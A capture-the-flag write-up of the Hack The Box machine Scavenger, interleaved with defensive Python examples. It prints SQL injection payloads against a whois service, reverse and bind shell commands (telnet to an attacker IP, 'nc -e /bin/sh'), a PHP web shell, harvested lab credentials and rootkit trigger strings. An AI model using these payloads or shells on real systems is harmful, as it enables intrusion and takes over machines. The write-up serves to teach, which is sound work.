Hack The Box - Scavenger Writeup

System information



Initial scan

Nmap shows some services active and listening


Checking each daemon manually I can see that:

  • FTP is vsFTPd 3.0.3
  • SMTP is ib01.supersechosting.htb ESMTP Exim 4.89
  • HTTP is an Apache 2.4.25 on Debian. The default page shows a vhost config error: 

  • WHOIS is backed by a MariaDB database:


Opening the web page www.supersechosting.htb (one of the virtualhosts) I see this:


Nothing special on this page...

Initial foothold

As far as I know (maybe I'm dumb) there are no known vulnerabilities in these service versions, so my focus is on the whois service backed by MariaDB, which might be vulnerable to SQL injection.
After some tries, the first successful SQL command I can run is a classic "UNION SELECT":

# whois  -h 10.10.10.155 "') UNION SELECT table_schema, table_name, 1 FROM information_schema.tables; "

% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb

1222 (21000): The used SELECT statements have a different number of columns

The server's reply shows that my input reaches the SQL engine, but the injected SELECT has the wrong number of columns (MariaDB error 1222), so the syntax still needs adjusting.

# whois  -h 10.10.10.155 "') UNION SELECT  table_name,1 FROM information_schema.tables  -- ' "

The reply is a list of table names, concatenated without separators:
ALL_PLUGINSAPPLICABLE_ROLESCHARACTER_SETSCOLLATIONSCOLLATION_CHARACTER_SET_APPLICABILITYCOLUMNSCOLUMN_PRIVILEGESENABLED_ROLESENGINESEVENTSFILESGLOBAL_STATUSGLOBAL_VARIABLESKEY_CACHESKEY_COLUMN_USAGEPARAMETERSPARTITIONSPLUGINSPROCESSLISTPROFILINGREFERENTIAL_CONSTRAINTSROUTINESSCHEMATASCHEMA_PRIVILEGESSESSION_STATUSSESSION_VARIABLESSTATISTICSSYSTEM_VARIABLESTABLESTABLESPACESTABLE_CONSTRAINTSTABLE_PRIVILEGESTRIGGERSUSER_PRIVILEGESVIEWSGEOMETRY_COLUMNSSPATIAL_REF_SYSCLIENT_STATISTICSINDEX_STATISTICSINNODB_SYS_DATAFILESTABLE_STATISTICSINNODB_SYS_TABLESTATSUSER_STATISTICSINNODB_SYS_INDEXESXTRADB_RSEGINNODB_CMP_PER_INDEXINNODB_TRXCHANGED_PAGE_BITMAPSINNODB_FT_BEING_DELETEDINNODB_LOCK_WAITSINNODB_LOCKSINNODB_TABLESPACES_ENCRYPTIONXTRADB_INTERNAL_HASH_TABLESINNODB_SYS_FIELDSINNODB_CMPMEM_RESETINNODB_CMPINNODB_FT_INDEX_TABLEINNODB_SYS_TABLESPACESINNODB_MUTEXESINNODB_BUFFER_PAGE_LRUINNODB_SYS_FOREIGN_COLSINNODB_CMP_RESETINNODB_BUFFER_POOL_STATSINNODB_FT_INDEX_CACHEINNODB_SYS_FOREIGNINNODB_METRICSINNODB_FT_DEFAULT_STOPWORDINNODB_CMPMEMINNODB_SYS_TABLESINNODB_SYS_COLUMNSINNODB_FT_CONFIGINNODB_BUFFER_PAGEINNODB_CMP_PER_INDEX_RESETXTRADB_READ_VIEWINNODB_SYS_SEMAPHORE_WAITSINNODB_CHANGED_PAGESINNODB_FT_DELETEDINNODB_TABLESPACES_SCRUBBINGcustomers

This means that, besides the information_schema tables, there is a table named customers.
The next step is to find the names of the columns of that table:
# whois  -h 10.10.10.155 "') UNION SELECT  column_name,1 FROM information_schema.columns where table_name='customers' -- ' "

% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb
% This query returned 3 object

Iddomaindata

This means that the columns are id, domain and data.
Querying the domain column reveals the following domains:

  • Supersechosting.htb
  • Justanotherblog.htb
  • Pwnhats.htb
  • Rentahacker.htb
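As an added example (not code from the original writeup or from the box), here is the vulnerable pattern behind the whois lookup placed beside its parameterized fix. SQLite stands in for MariaDB, the customers table and its rows are constructed, the exact shape of the daemon's SQL is an assumption inferred from the closing ') in the payload above, and the UNION payload targets sqlite_master because SQLite has no information_schema:

```python
import sqlite3

# Stand-in database: SQLite takes the place of the MariaDB behind the real
# whois daemon. The customers table and its rows are constructed for this
# example; only the column names (id, domain, data) come from the writeup.
def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE customers (id INTEGER PRIMARY KEY, domain TEXT, data TEXT);
        INSERT INTO customers (domain, data) VALUES
            ('supersechosting.htb', 'registrant: Super Sec Hosting'),
            ('justanotherblog.htb', 'registrant: Just Another Blog');
    """)
    return conn


def whois_lookup_vulnerable(conn, query):
    # Assumed shape of the daemon's query: the closing ') in the writeup's
    # payload suggests the domain is compared inside quotes and parentheses.
    # String formatting lets the caller's text become part of the SQL grammar.
    sql = "SELECT domain, data FROM customers WHERE (domain = '%s')" % query
    return conn.execute(sql).fetchall()


def whois_lookup_safe(conn, query):
    # Same query, but the lookup value travels as a bound parameter, so the
    # database never parses it as SQL, whatever characters it contains.
    sql = "SELECT domain, data FROM customers WHERE (domain = ?)"
    return conn.execute(sql, (query,)).fetchall()


def error_leak(conn, query):
    # Returns the database error text a naive daemon would echo back to the
    # client (the writeup's "1222 (21000)" line), or None when the query ran.
    try:
        whois_lookup_vulnerable(conn, query)
        return None
    except sqlite3.Error as exc:
        return str(exc)


# SQLite keeps its catalogue in sqlite_master rather than information_schema,
# so the writeup's UNION payload is adapted to that table name.
UNION_PAYLOAD = "') UNION SELECT name, 1 FROM sqlite_master -- '"
BAD_COLUMN_COUNT = "') UNION SELECT name, 1, 2 FROM sqlite_master -- '"


def demo():
    conn = build_demo_db()
    return {
        "normal": whois_lookup_safe(conn, "supersechosting.htb"),
        "vulnerable": whois_lookup_vulnerable(conn, UNION_PAYLOAD),
        "safe": whois_lookup_safe(conn, UNION_PAYLOAD),
        "error": error_leak(conn, BAD_COLUMN_COUNT),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Two things worth noting from the output: the parameterized version returns no rows for the payload instead of the catalogue, and the verbatim database error is itself an oracle (it told the writeup's author exactly how many columns to use), so a whois front end should log such errors server-side and return a generic message.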

After adding the domain mappings to my DNS I can open the websites in a web browser and find that:
  • www.supersechosting.htb looks like a plain HTML website
  • www.justanotherblog.htb has only an “under construction” logo
  • www.pwnhats.htb is an e-commerce site running PrestaShop on top of PHP, MySQL and phpMyAdmin
  • www.rentahacker.htb is a blog on WordPress 5.0


I tried to find some vulnerability or CVE for them, but with no luck.
I then ran dirbuster on them, with no valuable results.

So I turned to DNS service to find additional information, performing a zone transfer (AXFR):

The website http://sec03.rentahacker.htb shows a page with an image and a leet-speak message saying that the site was owned.

Running dirbuster I can find a login page of the Mantis bug tracker:
But it doesn't seem valuable or usable as an entry point.
Dirbuster also shows other pages:
  • wiki.php
  • shell.php

The last one seems very interesting and its output is blank: maybe it accepts some parameters, but which ones?
Wfuzz can help to find them.
The syntax is wfuzz -w wordfile http://URL/FUZZ=sometext: wfuzz substitutes FUZZ with each word from the wordfile.

In this case:
It picks words from the common.txt file and requests URLs like these:
  • http://sec03.rentahacker.htb/shell.php?admin=ls
  • http://sec03.rentahacker.htb/shell.php?cmd=ls
  • http://sec03.rentahacker.htb/shell.php?ftp=ls

The output is this one:

Here 200 is the HTTP response code, and the zeros in the other columns mean a reply with 0 lines, 0 words and 0 chars of output.

I let it run until I see a non-zero output:

It corresponds to the parameter hidden.
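From the defender's side, the fuzzing run above leaves a very recognisable trace in the web server log: one client hitting the same script with many different parameter names, almost all answered with an empty body. The following is an added example (not part of the writeup) that runs that check over constructed Apache combined-format log lines; the IPs, timestamps, sizes and the threshold of three distinct parameter names are all assumptions chosen for the demo:

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache "combined" format (not taken from the
# page): one client tries several parameter names against shell.php, and only
# one of them produces a non-empty body.
SAMPLE_LOG = """\
10.10.16.65 - - [01/Mar/2019:10:00:01 +0000] "GET /shell.php?admin=ls HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.16.65 - - [01/Mar/2019:10:00:01 +0000] "GET /shell.php?cmd=ls HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.16.65 - - [01/Mar/2019:10:00:01 +0000] "GET /shell.php?ftp=ls HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.16.65 - - [01/Mar/2019:10:00:02 +0000] "GET /shell.php?hidden=ls HTTP/1.1" 200 61 "-" "Mozilla/5.0"
10.10.14.3 - - [01/Mar/2019:10:00:05 +0000] "GET /wiki.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return the fields this check needs, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    size = m.group("size")
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        # parameter names only; the values do not matter for this check
        "params": sorted(parse_qs(parts.query, keep_blank_values=True)),
        "status": int(m.group("status")),
        "size": 0 if size == "-" else int(size),
    }


def find_param_fuzzing(log_text, min_distinct_params=3):
    """Flag (client, path) pairs that were probed with many distinct parameter names."""
    seen = defaultdict(set)        # (ip, path) -> parameter names tried
    empty = defaultdict(int)       # (ip, path) -> requests answered with an empty body
    answered = defaultdict(set)    # (ip, path) -> parameter names that got output
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not rec["params"]:
            continue
        key = (rec["ip"], rec["path"])
        seen[key].update(rec["params"])
        if rec["size"] == 0:
            empty[key] += 1
        else:
            answered[key].update(rec["params"])
    alerts = []
    for (ip, path), params in seen.items():
        if len(params) >= min_distinct_params:
            alerts.append({
                "client": ip,
                "path": path,
                "distinct_params": len(params),
                "empty_replies": empty[(ip, path)],
                "params_with_output": sorted(answered[(ip, path)]),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_param_fuzzing(SAMPLE_LOG):
        print(alert)
```

The alert lists which parameter names finally produced output, which is exactly the information the attacker was after and therefore the one an analyst wants first. The check deliberately ignores the User-Agent, since a fuzzer's default agent string is trivially changed while the parameter churn is not.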

The next step is to use this parameter by opening the URL http://sec03.rentahacker.htb/shell.php?hidden=ls
Now that I have found a way to execute commands, it's time to try some.

First of all a ping back to my computer... and it works!

Next a reverse connection to my computer (telnet 10.10.16.65 6666), but it doesn't work.


Next a bind shell with nc -lvp 6666 -e /bin/sh but it's not working either.

User Escalation (more than one)


So I believe it's time to look into the filesystem. The first look is in /home, where there are some folders:
  • ib01c01
  • ib01c02
  • ib01c03
  • ib01ftp
  • ib01wwwsupport
Looks like it will be a long journey if I have to escalate through more than one user...
The first look is in /home/ib01c03/www/ where I can find a wp-config.php, but the output is not helpful:


I can base64-encode it, copy/paste the content to my machine and decode it there:


Looks like there is an account:
  • Username: ib01c03
  • Password: Thi$sh1tIsN0tGut
Unfortunately it's not valid for SSH, but it works with FTP.
Connecting to it, I can look into the user's home, but there is no valuable content....
Though there is something in /var/mail (which contains the user's mail):
So now I have an additional FTP account:

  • User ib01ftp
  • Pass: YghRt56_Ta
Connecting to FTP as user ib01ftp I can find two folders:


In the first one there are a note.txt file, a pcap and a log file:


The note.txt file gives a hint to look into the pcap file:

Opening the pcap file with Wireshark I can filter the HTTP streams and the 20th TCP stream.

So I believe we can find some juicy content in the pcap file.

Looking into the TCP streams, in “tcp.stream eq 20” I can find a POST to an admin dashboard with a username and password:



Username: pwnhats@pwnhats.htb
Password:    GetYouAH4t!

Opening it with a web browser I can see that it is the admin dashboard of the PrestaShop e-commerce site.

In another TCP flow I see a specific POST request that uses the proxy settings in the IMAP section, which is prone to RCE.


The part in the red circle can be decoded as a netcat reverse shell:


This is confirmed on the Scavenger machine:



The next step is to use Burp to replicate this POST request and execute commands, like a ping back to my computer:


I could try to execute commands like netcat, but I think the connections are blocked, so I choose to upload a shell2.php file with a command like this one:
echo "<?php echo \"<pre>AAAA\"; \$cmd=(\$_REQUEST['cmd']); system(\$cmd);  ?>" > shell2.php

I encode it as base64, put it in Burp and use it:



I'm able to execute commands as user ib01c01 (please ignore the "AAAA" strings I added during debugging).

Next I can run ls in the home folder and show the user.txt file, which contains the user flag.

The file access.txt contains credentials for user ib01c01, valid for FTP but not for SSH:
Connecting to FTP I can see the content of the home:

But the .ssh folder is not writable, so there is no way to put an SSH public key there to get shell access...
Also the other folder doesn't contain anything valuable.

Just out of curiosity I can look at the startup iptables rules in /etc and see why the reverse shell is not working: basically only traffic on the ports of the listening services can flow in INPUT and OUTPUT:
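The rules themselves are only shown as a screenshot, so as an added example (not the machine's real configuration and not code from the writeup) here is a ruleset constructed in iptables-save format to match the description, DROP policies with only the listening services' ports opened, together with a small first-match evaluator that answers why the reverse shell, the bind shell and the ping behaved the way they did. The evaluator is deliberately simple: it understands -p, -i, -o, --sport and --dport, ignores -m and connection state, and the port numbers and interface name are assumptions:

```python
import re

# Constructed ruleset in iptables-save format, modelled on the writeup's
# description (only the listening services' ports may flow in INPUT and
# OUTPUT); the machine's real rules are not reproduced on the page.
RULES = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -p icmp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 21 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 25 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 43 -j ACCEPT
-A INPUT -p udp -m udp --dport 53 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -p icmp -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 21 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 25 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 43 -j ACCEPT
-A OUTPUT -p udp -m udp --sport 53 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -j ACCEPT
COMMIT
"""

RULE_RE = re.compile(r"^-A (\S+) (.*?) ?-j (\S+)\s*$")
MATCH_OPTS = ("-p", "-i", "-o", "--sport", "--dport")


def parse_ruleset(text):
    """Return (chain policies, chain rules) from iptables-save text.

    Only the matches this model understands are kept; anything else on a rule
    line (such as the -m loader options) is ignored.
    """
    policies, chains = {}, {}
    for line in text.splitlines():
        if line.startswith(":"):
            name, policy = line[1:].split()[:2]
            policies[name] = policy
            chains.setdefault(name, [])
        elif line.startswith("-A "):
            chain, opts, target = RULE_RE.match(line).groups()
            tokens = opts.split()
            rule = {"target": target}
            for i, tok in enumerate(tokens):
                if tok in MATCH_OPTS:
                    rule[tok] = tokens[i + 1]
            chains.setdefault(chain, []).append(rule)
    return policies, chains


def verdict(policies, chains, chain, proto, sport=None, dport=None, iface="eth0"):
    """First-match evaluation of one packet against a chain, falling back to the policy."""
    for rule in chains.get(chain, []):
        if rule.get("-p", proto) != proto:
            continue
        if rule.get("-i", iface) != iface or rule.get("-o", iface) != iface:
            continue
        if "--sport" in rule and int(rule["--sport"]) != sport:
            continue
        if "--dport" in rule and int(rule["--dport"]) != dport:
            continue
        return rule["target"]
    return policies.get(chain, "ACCEPT")


def new_connection_allowed(text, direction, proto, port, ephemeral=40000):
    """Would the first packet of a new connection get through?

    direction is "outbound" (this host connects to a remote port) or
    "inbound" (a remote host connects to a local port); the other side of the
    connection uses an ephemeral source port.
    """
    policies, chains = parse_ruleset(text)
    if direction == "outbound":
        return verdict(policies, chains, "OUTPUT", proto, sport=ephemeral, dport=port) == "ACCEPT"
    return verdict(policies, chains, "INPUT", proto, sport=ephemeral, dport=port) == "ACCEPT"


if __name__ == "__main__":
    for label, args in {
        "reverse shell to remote port 6666": ("outbound", "tcp", 6666),
        "bind shell on local port 6666": ("inbound", "tcp", 6666),
        "ICMP echo (ping back)": ("outbound", "icmp", None),
        "client connecting to local port 80": ("inbound", "tcp", 80),
    }.items():
        print(label, "->", "allowed" if new_connection_allowed(RULES, *args) else "blocked")
```

With these rules an outbound connection to an arbitrary port never matches an OUTPUT rule (its source port is ephemeral, not a service port) and falls to the DROP policy, an inbound connection to 6666 is dropped the same way in INPUT, while ICMP is accepted in both directions, which matches the three observations above. The lesson for a defender is that this egress filter worked as intended; the compromise still happened because the web application itself could be driven over the permitted port 80.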


Root Escalation

For this escalation I need to go back to the PCAP file.
Looking at the TCP streams from the end of the file, I can see that there are some encrypted communications on ports 4444 and 4445.
Just before this stream there is an HTTP (port 80) stream that can be filtered with "tcp.stream eq 20". It downloads a file root.c:

Looking at it and searching the Internet, it seems that this is a rootkit for Linux.
Basically, it is an LKM that creates a char device named /dev/ttyR0.
When a standard user sends a special string to this device, their shell gets elevated privileges.

In the original code the magic string is g0tR0ot

So a command like
echo "g0tR0ot" > /dev/ttyR0; id
will run the id command as root.

In the case of Scavenger I run the command lsmod:

It seems that the machine has the LKM loaded.
But the command above is not elevating privileges...

I believe that the LKM was compiled with a different magic string.
The compiled module (.ko file) can be found in “/home/ib01c01/…/” (note the space in front of the folder name) and can be downloaded with FTP.

With the objdump tool I can disassemble the module and look into the code.
In a section of the code I can find the instructions that define the magic value (the two movl below):


The magic word is defined by the hex string 67 33 74 50 72 31 76, which decoded to ASCII is g3tPr1v.
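The reason the string has to be read out of the disassembly rather than with strings is that the compiler materialised the short literal as two 32-bit immediate stores, and x86 writes immediates little-endian, so the value in the mnemonic ($0x50743367) is the string bytes reversed. As an added example (not code from the writeup, and the listing below is constructed rather than the real objdump output, with the register, offsets and addresses being assumptions), this decodes such stores back into the string:

```python
import re

# Constructed objdump-style listing (the writeup shows the real one only as a
# screenshot). The two movl instructions store the 7-byte magic string as two
# 32-bit immediates; the raw-bytes column shows the string bytes in order.
CONSTRUCTED_LISTING = """\
 120:	48 8b 05 00 00 00 00 	mov    0x0(%rip),%rax
 127:	c7 00 67 33 74 50    	movl   $0x50743367,(%rax)
 12d:	c7 40 04 72 31 76 00 	movl   $0x763172,0x4(%rax)
 134:	c3                   	retq
"""

# movl $imm32, disp(%reg): capture the immediate and the optional displacement.
MOVL_RE = re.compile(r"movl\s+\$0x([0-9a-fA-F]+),(?:0x([0-9a-fA-F]+))?\(%\w+\)")


def immediate_stores(listing):
    """Yield (offset, 4 little-endian bytes) for each movl immediate store."""
    for m in MOVL_RE.finditer(listing):
        imm = int(m.group(1), 16)
        offset = int(m.group(2), 16) if m.group(2) else 0
        # x86 is little-endian: 0x50743367 lands in memory as 67 33 74 50.
        yield offset, imm.to_bytes(4, "little")


def recover_string(listing):
    """Reassemble the stored bytes in memory order and cut at the first NUL."""
    buf = b"".join(chunk for _, chunk in sorted(immediate_stores(listing)))
    return buf.split(b"\x00", 1)[0].decode("ascii")


def hex_dump(text):
    """Render a string the way the writeup quotes it: space-separated hex bytes."""
    return " ".join("%02x" % b for b in text.encode("ascii"))


if __name__ == "__main__":
    magic = recover_string(CONSTRUCTED_LISTING)
    print(hex_dump(magic), "->", magic)        # 67 33 74 50 72 31 76 -> g3tPr1v
    print("differs from upstream default:", magic != "g0tR0ot")
```

Sorting by displacement matters when the compiler emits the stores out of order; cutting at the first NUL drops the terminator that pads the second immediate. For an incident responder the same observation cuts the other way: a rebuilt rootkit with a changed trigger string defeats signatures on the upstream literal, so detection should key on the loaded module and the unexpected /dev/ttyR0 character device rather than on the string.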



So now, using this string, I can execute id as root:

So it's only a matter of viewing the /root folder and disclosing the content of some files.

Credits.txt contains information on the LKM:


root.txt contains the root flag



